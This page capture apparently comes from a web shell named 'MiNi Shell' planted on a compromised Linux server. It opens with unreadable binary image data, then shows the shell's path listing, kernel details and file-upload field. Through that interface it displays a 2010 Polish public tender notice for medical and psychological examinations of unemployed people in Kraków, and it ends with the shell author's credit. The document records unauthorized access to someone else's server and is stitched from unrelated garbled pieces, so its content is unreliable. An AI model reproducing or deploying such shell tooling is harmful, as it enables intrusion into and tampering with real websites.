JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100218/33949-N-2010.html

<p class="kh_header"><b>Kraków: postępowanie o udzielenie zamówienia publicznego 
na usługi polegające na wykonywaniu specjalistycznych badań psychologicznych i lekarskich umożliwiających wydanie opinii o przydatności zawodowej do pracy i zawodu albo kierunku szkolenia osobom bezrobotnym zarejestrowanym w Urzędzie Pracy Powiatu Krakowskiego, zgodnie z art. 38 ust. 1 pkt 1 c ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r.  Nr 69 poz. 415 z późn. zm)  
znak sprawy: ZP- 271/09/2010</b><br>
<b>Numer ogłoszenia: 33949 - 2010; data zamieszczenia: 18.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Pracy Powiatu Krakowskiego , ul. Mazowiecka 21, 30-019 Kraków, woj. małopolskie, tel. 012 2997425, 012 6237480, faks 012 6325215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uppk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> postępowanie o udzielenie zamówienia publicznego 
na usługi polegające na wykonywaniu specjalistycznych badań psychologicznych i lekarskich umożliwiających wydanie opinii o przydatności zawodowej do pracy i zawodu albo kierunku szkolenia osobom bezrobotnym zarejestrowanym w Urzędzie Pracy Powiatu Krakowskiego, zgodnie z art. 38 ust. 1 pkt 1 c ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r.  Nr 69 poz. 415 z późn. zm)  
znak sprawy: ZP- 271/09/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są usługi polegające na wykonywaniu specjalistycznych badań psychologicznych i lekarskich umożliwiających wydanie opinii o przydatności zawodowej do pracy i zawodu albo kierunku szkolenia, zgodnie z art. 38 ust.1 pkt 1 c ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy.
2.	Celem zamówienia jest wykonywanie badań lekarskich i psychologicznych osób bezrobotnych zarejestrowanych  w Urzędzie Pracy Powiatu Krakowskiego, w wyniku których będzie możliwe stwierdzenie zdolności osoby skierowanej do wykonywania pracy, uczestnictwa w szkoleniu lub przygotowaniu zawodowym dorosłych, odbywania stażu, wykonywania prac społecznie użytecznych. 
3.	Opinia wydana przez lekarza medycyny pracy będąca wynikiem badań lekarskich i psychologicznych będzie istotna dla sporządzenia diagnozy  dotyczącej możliwości podjęcia przez bezrobotnego odpowiedniej pracy, tzn. takiej, do wykonywania której ma on wystarczające kwalifikacje lub doświadczenie zawodowe. Ponadto, badania lekarskie i/lub psychologiczne stanowić mają informację weryfikującą zgłaszane przez bezrobotnego, lecz dotychczas nieudokumentowane, ograniczenia zdrowotne, zarówno natury fizycznej jak również psychicznej. 
4.	Pracownik urzędu wystawiający skierowanie osobie bezrobotnej określi zakres oczekiwanych informacji dotyczących przeciwwskazań lub wskazań do zatrudnienia. Jednakże to lekarz medycyny pracy, uwzględniając zakres oczekiwanych informacji zamawiającego, wskaże konieczne do zrealizowania konsultacje specjalistyczne i badania diagnostyczne. 
5.	Na podstawie informacji ubiegłorocznych, zamawiający ocenia, że - przede wszystkim -  osoby bezrobotne kierowane były przez lekarza medycyny pracy na konsultacje lekarzy specjalistów z dziedziny neurologii, laryngologii, okulistyki, chirurgii, ortopedii, psychiatrii, alergologii, diabetologii oraz reumatologii. Zamawiający nie jest w stanie wskazać precyzyjnie z konsultacji jakich specjalistów będą korzystać osoby bezrobotne, gdyż decyzję o tym podejmie lekarz medycyny pracy.
6.	Poza konsultacjami lekarskimi konieczna może się okazać konsultacja psychologiczna. W związku z tym, zamawiający  oczekuje, że wykonawca będzie dysponował na potrzeby realizacji zamówienia co najmniej jednym psychologiem, o którym mowa w art. 2 ust. 3 pkt 2 ustawy z dnia 27 czerwca 1997 r. o służbie medycyny pracy.  
7.	Zamawiający oczekuje, że wykonawca przeprowadzi samodzielnie lub zleci innym podmiotom  wykonanie wszystkich badań i konsultacji zleconych przez lekarza medycyny pracy. 
8.	Lekarz medycyny pracy, na podstawie badań diagnostycznych i/lub konsultacji lekarzy specjalistów i/lub konsultacji psychologa, wystawi osobie bezrobotnej opinię o przydatności zawodowej do pracy i zawodu albo kierunku szkolenia bądź opinię o braku przydatności zawodowej do pracy i zawodu albo kierunku szkolenia.
9.	Zamawiający zleci przeprowadzenie od 1000 do 1200 badań lekarzowi medycyny pracy, który, zależnie od własnej oceny sytuacji bezrobotnego, skieruje badane osoby bezrobotne na dalsze badania specjalistyczne oraz diagnostyczne.  

10.	Podstawą do przeprowadzenia przez wykonawcę badania będzie imienne skierowanie wydane każdej osobie kierowanej przez Zamawiającego, podpisane przez upoważnionego pracownika Urzędu Pracy Powiatu Krakowskiego oraz opatrzone pieczęcią firmową Urzędu Pracy Powiatu Krakowskiego lub jego Filii  w Skawinie, Słomnikach lub Krzeszowicach. Wzór skierowania stanowi załącznik nr  1A i 1B  do SIWZ.
11.	Wykonywane usługi medyczne, tj. konsultacje lekarskie i psychologiczne, pobrania materiału do badań laboratoryjnych, wykonywanie zdjęć RTG oraz wszelkie inne badania dodatkowe zlecone przez lekarza medycyny pracy realizowane będą  w obrębie tej samej lokalizacji obiektu, bez potrzeby przemieszczania się osób bezrobotnych do innych placówek wykonawcy przedmiotowych usług. Lokalizacja, w której wykonawca będzie realizował usługi musi znajdować się w mieście Krakowie. Do oferty należy dołączyć informację o usytuowaniu obiektu, w którym realizowane będą  badania. 
12.	Z tytułu przeprowadzonych badań wykonawca wystawi zamawiającemu cztery faktury VAT/rachunki na dzień 15 - go każdego miesiąca - dla Oddziału Kraków i każdej z Filii zamawiającego odrębny. Do każdej faktury VAT/rachunku załączony zostanie imienny wykaz osób przebadanych przez Wykonawcę z  wyszczególnionymi datami oraz  kodami badań pochodzącymi z Klasyfikacji procedur medycznych ICD. 
13.	W sytuacji, gdy wykonawca będzie zlecał wykonanie części zamówienia innym podmiotom, wówczas ponoszone przez wykonawcę koszty realizacji zleconej części zamówienia będą comiesięcznie refakturowane zamawiającemu, tj. koszty realizacji części zamówienia przeniesione zostaną na zamawiającego po cenie zakupu zapłaconej przez wykonawcę, bez doliczania jakiejkolwiek marży lub innego wynagrodzenia. Wykonawca koszty refakturowane będzie wyszczególniał na wystawianych przez siebie fakturach VAT/rachunkach, o których mowa w punkcie 6, jako odrębną pozycję.
14.	W ramach realizowanego zamówienia Wykonawca zobowiązany będzie do: 
a)	wykonywania badań lekarskich bez zbędnej zwłoki, zgodnie z zasadami sztuki lekarskiej przez uprawnionych do ich wykonania lekarzy, a w przypadku badań laboratoryjnych - specjalistów analityki medycznej, posiadających adekwatne do rodzaju badania kwalifikacje zawodowe; 
b)	wydania osobie przebadanej zaświadczenia stwierdzającego wyniki badania;
c)	prowadzenia dokumentacji medycznej zgodnie z zasadami określonymi w art. 11 ustawy z dnia 27 czerwca 1997 r. o służbie medycyny pracy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.14.50.00-7, 85.14.80.00-8, 85.15.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy dysponują lub będą dysponować medycznym laboratorium diagnostycznym wykonującym badania materiału biologicznego, działającym na zasadach określonych w ustawie z dn. 27 lipca 2001 r. o diagnostyce laboratoryjnej (Dz. U. z 2004 r. Nr 144 poz. 1529 z późn. zm.); 
Wykonawcy dysponują lub będą dysponować pracownią RTG spełniającą wymogi rozporządzenia ministra zdrowia z dnia 27 marca 2008 r. w sprawie minimalnych wymagań dla jednostek ochrony zdrowia udzielających świadczeń zdrowotnych z zakresu rentgenodiagnostyki, radiologii zabiegowej oraz diagnostyki i terapii radioizotopowej chorób nienowotworowych (Dz. U. z 2008 r. Nr 59, poz. 365 z późn. zm);
Ocena spełnienia w/wwarunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w złożonych oświadczeniach i dokumentach wyszczególnionych w  punkcie VI SIWZ, tj.:
(1) wyazie narzędzi, wyposażenia i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami - załącznik nr 6 do SIWZ (2) pisemnym zobowiązaniu innych podmiotów do oddania do dyspozycji wykonawcy zasobów na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli w wykazie, o którym mowa powyżej wykonawca wykazał, że będzie nimi dysponował (3) oświadczeniu o spełnianiu warunków udziału w postępowaniu - załącznik nr 3 do SIWZ. Jeżeli wykonawca, wykazując spełnianie warunku określonego w punkcie IV. 3 SIWZ, polega na zasobach innych podmiotów, zobowiązany jest wykazać, że w stosunku do tych podmiotów brak jest podstaw wykluczenia z postępowania o udzielenie zamówienia, poprzez złożenie razem z ofertą oświadczenia o braku podstaw do wykluczenia - załącznik nr 8 do SIWZ, 
Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawcy dysponują lub będą dysponować co najmniej dwiema osobami, które wykonują zawód lekarza w zakresie profilaktycznej opieki zdrowotnej nad pracującymi, które dokonały zgłoszenia podjęcia działalności lekarza w zakresie profilaktycznej opieki zdrowotnej nad pracującymi we właściwym wojewódzkim ośrodku medycyny pracy (zgodnie z art. 10 ustawy z dnia 27 czerwca 1997 r. o służbie medycyny pracy - tekst jednolity Dz. U. z 2004 r. Nr 125 poz. 1317 z późn. zm.);
 dysponują lub będą dysponować co najmniej jedną osobą wykonującą zawód lekarza specjalisty z dziedziny neurologii;
dysponują lub będą dysponować co najmniej jedną osobą wykonującą zawód lekarza specjalisty z dziedziny laryngologii; 
dysponują lub będą dysponować co najmniej jedną osobą wykonującą zawód lekarza specjalisty z dziedziny okulistyki; 
dysponują lub będą dysponować co najmniej jedną osobą wykonującą zawód lekarza specjalisty z dziedziny chirurgii ogólnej; 
dysponują lub będą dysponować co najmniej jedną osobą wykonującą zawód lekarza specjalisty z dziedziny ortopedii; 
dysponują lub będą dysponować co najmniej jedną osobą wykonującą zawód lekarza specjalisty z dziedziny psychiatrii; 
dysponują lub będą dysponować co najmniej jedną osobą wykonującą zawód lekarza specjalisty z dziedziny alergologii; 
dysponują lub będą dysponować co najmniej jedną osobą wykonującą zawód lekarza specjalisty z dziedziny diabetologii; 
dysponują lub będą dysponować co najmniej jedną osobą wykonującą zawód lekarza specjalisty z dziedziny reumatologii;
dysponują lub będą dysponować co najmniej jednym psychologiem, o którym mowa w art. 2 ust. 3 pkt 2 ustawy z dnia 27 czerwca 1997 r. o służbie medycyny pracy;
Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w złożonych oświadczeniach i dokumentach wyszczególnionych w  punkcie VI SIWZ, tj.:
Wykazie osób, o których mowa w punkcie IV. 3 lit. od a do k, a które jednocześnie będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 4 do SIWZ;
Oświadczeniu, że osoby uczestniczące w wykonywaniu zamówienia, posiadają wymagane uprawnienia - załącznik nr 5 do SIWZ
Pisemnym zobowiązaniu innych podmiotów do oddania do dyspozycji wykonawcy osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w punkcie 3, wykonawca wskazał osoby, którymi będzie dysponował; oświadczeniu o spełnianiu warunków udziału w postępowaniu - załącznik nr 3 do SIWZ;
Jeżeli wykonawca, wykazując spełnianie warunku określonego w punkcie IV. 3 SIWZ, polega na zasobach innych podmiotów, zobowiązany jest wykazać, że w stosunku do tych podmiotów brak jest podstaw wykluczenia z postępowania o udzielenie zamówienia, poprzez złożenie razem z ofertą oświadczenia o braku podstaw do wykluczenia - załącznik nr 8 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłacona polisę ubezpieczeniowa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia. Ubezpieczenie winno wskazywać sumę gwarancyjną wynoszącą  nie mniej niż 250 000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy. Wprowadzone zmiany dotyczyć mogą terminu realizacji umowy w przypadku wystąpienia okoliczności niezależnych od zamawiającego lub wykonawcy, ograniczenia zakresu przedmiotu zamówienia w przypadku powstania okoliczności powodujących, że wykonanie tego zakresu nie leży w interesie publicznym oraz okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uppk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2010 godzina 10:00, miejsce: URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro, stanowisko dziennika podawczego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com